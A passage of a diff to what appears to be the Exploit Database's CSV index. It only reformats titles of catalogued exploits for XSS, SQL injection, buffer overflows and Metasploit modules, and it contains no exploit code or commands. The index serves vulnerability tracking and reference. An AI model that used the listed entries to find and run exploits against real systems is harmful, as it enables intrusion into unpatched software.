Damele",windows,remote,0 -32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 +32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS - 'search_query' Parameter Cross-Site Scripting",2008-11-17,d3v1l,php,webapps,0 32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,Metasploit,php,remote,80 32589,platforms/php/webapps/32589.html,"Kimson CMS - 'id' Parameter Cross-Site Scripting",2008-11-18,md.r00t,php,webapps,0 @@ -29369,7 +29369,7 @@ id,file,description,date,author,platform,type,port 32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32593,platforms/php/webapps/32593.txt,"Easyedit CMS page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32594,platforms/php/webapps/32594.txt,"Easyedit CMS news.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 -32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps,0 +32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps,0 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial Of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0 32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate SQL Injection",2008-11-23,ZoRLu,php,webapps,0 32598,platforms/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,php,webapps,0 @@ -29385,13 +29385,13 @@ id,file,description,date,author,platform,type,port 32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart PHPSESSID Cookie Manipulation Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 32609,platforms/asp/webapps/32609.txt,"Pre Classified Listings 1.0 - 'detailad.asp' SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32610,platforms/asp/webapps/32610.txt,"Pre Classified Listings 1.0 - 'signup.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 -32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 -32612,platforms/php/webapps/32612.txt,"Softbiz Classifieds Script showcategory.php radio Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script advertisers/signinform.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32614,platforms/php/webapps/32614.txt,"Softbiz Classifieds Script gallery.php radio Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script lostpassword.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script admin/adminhome.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script admin/index.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32611,platforms/asp/webapps/32611.txt,"CodeToad ASP Shopping Cart Script - Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 +32612,platforms/php/webapps/32612.txt,"Softbiz Classifieds Script - showcategory.php radio Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32613,platforms/php/webapps/32613.txt,"Softbiz Classifieds Script - advertisers/signinform.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32614,platforms/php/webapps/32614.txt,"Softbiz Classifieds Script - gallery.php radio Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32615,platforms/php/webapps/32615.txt,"Softbiz Classifieds Script - lostpassword.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32616,platforms/php/webapps/32616.txt,"Softbiz Classifieds Script - admin/adminhome.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32617,platforms/php/webapps/32617.txt,"Softbiz Classifieds Script - admin/index.php msg Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 32618,platforms/php/remote/32618.txt,"plexusCMS 0.5 - XSS Remote Shell Exploit & Credentials Leak",2014-03-31,neglomaniac,php,remote,0 32619,platforms/ios/webapps/32619.txt,"PhotoWIFI Lite 1.0 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,52789 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 @@ -29399,10 +29399,10 @@ id,file,description,date,author,platform,type,port 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO siteadmin/forgot.php Multiple Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32626,platforms/asp/webapps/32626.txt,"ASP Forum Script messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 -32627,platforms/php/webapps/32627.txt,"ASP Forum Script new_message.asp forum_id Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 -32628,platforms/asp/webapps/32628.txt,"ASP Forum Script messages.asp forum_id Parameter XSS",2008-12-01,Pouya_Server,asp,webapps,0 -32629,platforms/asp/webapps/32629.txt,"ASP Forum Script default.asp Query String XSS",2008-12-01,Pouya_Server,asp,webapps,0 +32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 +32627,platforms/php/webapps/32627.txt,"ASP Forum Script - new_message.asp forum_id Parameter XSS",2008-12-01,Pouya_Server,php,webapps,0 +32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - messages.asp forum_id Parameter XSS",2008-12-01,Pouya_Server,asp,webapps,0 +32629,platforms/asp/webapps/32629.txt,"ASP Forum Script - default.asp Query String XSS",2008-12-01,Pouya_Server,asp,webapps,0 32630,platforms/asp/webapps/32630.txt,"Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 32631,platforms/multiple/webapps/32631.txt,"IBM Rational ClearCase 7/8 - Cross-Site Scripting",2008-12-01,IBM,multiple,webapps,0 32632,platforms/php/webapps/32632.php,"Fantastico - 'index.php' Local File Inclusion",2008-12-02,Super-Crystal,php,webapps,0 @@ -29518,8 +29518,8 @@ id,file,description,date,author,platform,type,port 32749,platforms/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32750,platforms/asp/webapps/32750.txt,"OBLOG - 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,asp,webapps,0 32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0 -32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,Metasploit,windows,local,0 -32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,Metasploit,hardware,remote,0 +32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing",2014-04-08,Metasploit,windows,local,0 +32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection",2014-04-08,Metasploit,hardware,remote,0 32754,platforms/osx/dos/32754.c,"MacOS X 10.9 Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 32756,platforms/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 @@ -29535,7 +29535,7 @@ id,file,description,date,author,platform,type,port 32767,platforms/php/webapps/32767.txt,"QuickCMS 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,cgi,webapps,0 32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service",2009-01-30,strategma,php,dos,0 -32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 +32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation",2009-02-02,"Ruben Santamarta ",windows,local,0 32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 - (.m3u) Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 @@ -29553,17 +29553,17 @@ id,file,description,date,author,platform,type,port 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF",2014-04-30,"shyamkumar somana",hardware,webapps,80 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0 -32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,Metasploit,unix,remote,443 +32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution",2014-04-10,Metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32793,platforms/windows/local/32793.rb,"Microsoft Word - RTF Object Confusion (MS14-017)",2014-04-10,Metasploit,windows,local,0 -32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,Metasploit,php,remote,80 +32794,platforms/php/remote/32794.rb,"Vtiger - Install Unauthenticated Remote Command Execution",2014-04-10,Metasploit,php,remote,80 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'Login.asp' Multiple SQL Injection",2009-02-10,"Francesco Bianchino",asp,webapps,0 32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 - 'mod_sql' Username SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 -32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 +32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps,0 @@ -29588,7 +29588,7 @@ id,file,description,date,author,platform,type,port 32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 -32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 +32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' - Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps,0 32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 @@ -29619,8 +29619,8 @@ id,file,description,date,author,platform,type,port 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0 32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation",2009-04-02,laurent.desaulniers,php,webapps,0 -32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 -32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 +32856,platforms/linux/dos/32856.txt,"MPlayer - Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 +32857,platforms/linux/dos/32857.txt,"MPlayer - Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0 32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 @@ -29765,7 +29765,7 @@ id,file,description,date,author,platform,type,port 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 -33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 +33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String",2009-05-26,lofi42,hardware,remote,0 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 @@ -29793,7 +29793,7 @@ id,file,description,date,author,platform,type,port 33034,platforms/linux/remote/33034.txt,"WebKit XML External Entity Information Disclosure",2009-05-08,"Chris Evans",linux,remote,0 33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0 33036,platforms/linux/dos/33036.txt,"Git 1.6.3 Parameter Processing Remote Denial Of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 -33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 NULL Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 +33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 - NULL Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 33039,platforms/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 and SeaMonkey 1.1.16 Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote,0 33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 Message Handling Denial Of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 @@ -29824,7 +29824,7 @@ id,file,description,date,author,platform,type,port 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote,0 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0 33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Parameter Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0 -33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,Metasploit,windows,local,0 +33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,Metasploit,windows,local,0 33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution Exploit",2014-04-28,LOTFREE,php,webapps,80 33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 @@ -29842,7 +29842,7 @@ id,file,description,date,author,platform,type,port 33086,platforms/multiple/dos/33086.txt,"America's Army 3.0.4 - Invalid Query Remote Denial of Service",2009-06-06,"Luigi Auriemma",multiple,dos,0 33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0 33088,platforms/linux/dos/33088.txt,"Linux Kernel 2.6.30 - 'tun_chr_pool()' NULL Pointer Dereference",2009-06-17,"Christian Borntraeger",linux,dos,0 -33089,platforms/windows/remote/33089.pl,"iDefense COMRaider ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 +33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 @@ -30013,15 +30013,15 @@ id,file,description,date,author,platform,type,port 33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface /scripter.php Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface - Multiple Script m[] Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Parameter Directory Traversal",2009-09-29,"Infected Web",php,webapps,0 -33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 -33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 +33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 +33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder - 'group_id' Parameter SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps,0 33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution",2009-10-13,Skylined,windows,remote,0 33271,platforms/windows/dos/33271.py,"VMware Player and Workstation 6.5.3 - 'vmware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0 -33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 +33272,platforms/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component - Directory Traversal",2010-02-01,B-HUNT3|2,php,webapps,0 @@ -30078,7 +30078,7 @@ id,file,description,date,author,platform,type,port 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS",2014-05-12,"Dolev Farhi",windows,webapps,80 -33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,Metasploit,windows,remote,34205 +33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 - BKESimmgr.exe Buffer Overflow",2014-05-12,Metasploit,windows,remote,34205 33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player - Shader Buffer Overflow",2014-05-12,Metasploit,windows,remote,0 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 @@ -30212,7 +30212,7 @@ id,file,description,date,author,platform,type,port 33518,platforms/hardware/webapps/33518.txt,"ZyXEL P-660HW-T1 3 Wireless Router - CSRF",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 -33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,Metasploit,multiple,remote,9855 +33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload",2014-05-26,Metasploit,multiple,remote,9855 33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Remote Directory Traversal",2010-02-08,Markot,windows,remote,0 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 @@ -30229,7 +30229,7 @@ id,file,description,date,author,platform,type,port 33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Parameter Local File Inclusion",2010-01-15,"D. Fabian",php,webapps,0 33531,platforms/multiple/dos/33531.py,"Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow",2010-01-15,Intevydis,multiple,dos,0 33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption",2006-11-10,Intevydis,multiple,dos,0 -33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos,0 +33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl - ActiveX Control 'ViewProfile' Method Heap Buffer Overflow",2010-01-18,karak0rsan,windows,dos,0 33534,platforms/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Parameter Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps,0 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 - 'stat-server' Remote Arbitrary Command Injection",2010-01-15,"Frank Ch. Eigler",linux,remote,0 33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0 @@ -30275,7 +30275,7 @@ id,file,description,date,author,platform,type,port 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x (x64) - Personality Handling Local Denial of Service",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 -33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,Metasploit,java,remote,9200 +33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script - Arbitrary Java Execution",2014-05-30,Metasploit,java,remote,9200 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting",2010-02-04,s4r4d0,php,webapps,0 @@ -30300,7 +30300,7 @@ id,file,description,date,author,platform,type,port 33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 - 'login.php' Cross-Site Scripting",2010-02-08,vr,php,webapps,0 33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component - 'viewpage.php' SQL Injection",2010-02-09,JIKO,php,webapps,0 -33622,platforms/linux/remote/33622.txt,"Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 +33622,platforms/linux/remote/33622.txt,"Accellion File Transfer 